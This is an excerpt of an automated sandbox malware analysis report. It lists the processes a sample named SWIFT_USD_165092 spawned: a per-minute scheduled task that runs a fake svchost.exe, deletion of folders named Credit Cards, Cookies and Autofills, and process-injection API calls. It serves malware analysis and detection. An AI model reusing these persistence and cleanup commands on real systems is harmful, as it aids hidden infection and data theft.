                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                      Target ID:15
                                                                                      Start time:19:49:49
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:16
                                                                                      Start time:19:49:49
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:17
                                                                                      Start time:19:49:49
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:18
                                                                                      Start time:19:49:49
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:19
                                                                                      Start time:19:49:50
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                                                      Imagebase:0xbf0000
                                                                                      File size:185856 bytes
                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:20
                                                                                      Start time:19:49:51
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:21
                                                                                      Start time:19:49:52
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:22
                                                                                      Start time:19:49:53
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:tasklist
                                                                                      Imagebase:0x950000
                                                                                      File size:79872 bytes
                                                                                      MD5 hash:6B7D2FC3FB98B10A5F77B23DEF745F6F
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:23
                                                                                      Start time:19:49:53
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:24
                                                                                      Start time:19:49:59
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                      Imagebase:0x7ff679930000
                                                                                      File size:66048 bytes
                                                                                      MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:25
                                                                                      Start time:19:50:18
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards"
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:26
                                                                                      Start time:19:50:18
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:27
                                                                                      Start time:19:50:18
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies"
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:28
                                                                                      Start time:19:50:18
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:29
                                                                                      Start time:19:50:18
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills"
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:30
                                                                                      Start time:19:50:19
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:31
                                                                                      Start time:19:50:19
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\404d522a-62f5-4eb2-91f4-202649d15261"
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:32
                                                                                      Start time:19:50:19
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:33
                                                                                      Start time:19:50:26
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023"
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:34
                                                                                      Start time:19:50:26
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:37
                                                                                      Start time:19:50:28
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 3108
                                                                                      Imagebase:0x20000
                                                                                      File size:434592 bytes
                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Target ID:39
                                                                                      Start time:19:51:00
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0x640000
                                                                                      File size:2164736 bytes
                                                                                      MD5 hash:22BA147ED50FF44941FE486426432115
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Target ID:40
                                                                                      Start time:19:51:11
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0x5b0000
                                                                                      File size:2164736 bytes
                                                                                      MD5 hash:22BA147ED50FF44941FE486426432115
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000028.00000002.650586670.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                      Target ID:41
                                                                                      Start time:19:51:11
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards"
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:42
                                                                                      Start time:19:51:11
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost"
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:43
                                                                                      Start time:19:51:11
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:44
                                                                                      Start time:19:51:12
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:45
                                                                                      Start time:19:51:12
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:46
                                                                                      Start time:19:51:12
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:47
                                                                                      Start time:19:51:12
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                                                      Imagebase:0xbf0000
                                                                                      File size:185856 bytes
                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:48
                                                                                      Start time:19:51:13
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:49
                                                                                      Start time:19:51:14
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:50
                                                                                      Start time:19:51:14
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:51
                                                                                      Start time:19:51:14
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:52
                                                                                      Start time:19:51:14
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:53
                                                                                      Start time:19:51:15
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:54
                                                                                      Start time:19:51:16
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:tasklist
                                                                                      Imagebase:0x950000
                                                                                      File size:79872 bytes
                                                                                      MD5 hash:6B7D2FC3FB98B10A5F77B23DEF745F6F
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:55
                                                                                      Start time:19:51:16
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\88560075-49ce-438f-ba24-9980eb388270
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:56
                                                                                      Start time:19:51:16
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:57
                                                                                      Start time:19:51:16
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:58
                                                                                      Start time:19:51:32
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:59
                                                                                      Start time:19:51:33
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language


                                                                                        Execution Graph

                                                                                        Execution Coverage:19.4%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:4.3%
                                                                                        Total number of Nodes:69
                                                                                        Total number of Limit Nodes:2

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 012852B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessUser
                                                                                        • String ID:
                                                                                        • API String ID: 2217836671-0
                                                                                        • Opcode ID: 5c02af9419cb1b04bcdc203948c77155705db4ff587ae7908c2465c25b6138c0
                                                                                        • Instruction ID: 5341a2c1ea75b453f1ab2102b1fc908e1a12332058b01679e27975014de317d6
                                                                                        • Opcode Fuzzy Hash: 5c02af9419cb1b04bcdc203948c77155705db4ff587ae7908c2465c25b6138c0
                                                                                        • Instruction Fuzzy Hash: 5FA18971E112198FEB10DFA8C8817DDBBF2FF48304F0481A9E919A7291DB749985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 012852B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessUser
                                                                                        • String ID:
                                                                                        • API String ID: 2217836671-0
                                                                                        • Opcode ID: 1d7c304f6f2ec0c35cf8450c308f8b934d83a90d5394b09c8f7340f5cc03e8c8
                                                                                        • Instruction ID: eea8da063d16613b8e3f5a9b55f7598257cfa3deee5537f93eecac91d4671a6c
                                                                                        • Opcode Fuzzy Hash: 1d7c304f6f2ec0c35cf8450c308f8b934d83a90d5394b09c8f7340f5cc03e8c8
                                                                                        • Instruction Fuzzy Hash: A0A18B71E112199FEB10DFA8C8817DDBBF2FF48304F0481A9E919A7291DB749985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0128573D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: a3427504897f091b21ef7317687a9ebba76c6f877ea35d57d820f77222bf41af
                                                                                        • Instruction ID: 17f9e3e207eeb347b72aa219f64e669f3c1b675c6751c5e07384fc860e17347a
                                                                                        • Opcode Fuzzy Hash: a3427504897f091b21ef7317687a9ebba76c6f877ea35d57d820f77222bf41af
                                                                                        • Instruction Fuzzy Hash: 0B2105B1910249DFCB14DFAAC884BDEBBF4FB48320F10842AE919E7250D778A945CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0128573D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 4f69e1d6dd33ff4f69d5348d83472956d3ff0ef3e8bfabc8e3a1673898e80340
                                                                                        • Instruction ID: 852fb1e58e5d7027e778cae110f1c7a7b7aa10b1633b9b6ed76ec3b1750aaa3a
                                                                                        • Opcode Fuzzy Hash: 4f69e1d6dd33ff4f69d5348d83472956d3ff0ef3e8bfabc8e3a1673898e80340
                                                                                        • Instruction Fuzzy Hash: C32112B1910209DFCB14DF9AC884BDEBBF4FB48320F50842AE919A7250D778A940CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 202 1285450-12854a4 204 12854b0-12854dc SetThreadContext 202->204 205 12854a6-12854ae 202->205 206 12854de-12854e4 204->206 207 12854e5-1285506 204->207 205->204 206->207
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 012854CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID:
                                                                                        • API String ID: 1591575202-0
                                                                                        • Opcode ID: d29c4ba38ce6e51728b3ac29c4b5cf4c753e35f1cef9fc49a8cacfd56b35b4c8
                                                                                        • Instruction ID: add73ccbef2448fa1ba8f1aee78024df5d707a993a22cebc7cc288f4731821cb
                                                                                        • Opcode Fuzzy Hash: d29c4ba38ce6e51728b3ac29c4b5cf4c753e35f1cef9fc49a8cacfd56b35b4c8
                                                                                        • Instruction Fuzzy Hash: 332127B1D1061A9FCB10CFAAC5847EEFBF4FB48321F148169D418B3240D778A9458FA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 216 1285510-128559b ReadProcessMemory 218 128559d-12855a3 216->218 219 12855a4-12855c5 216->219 218->219
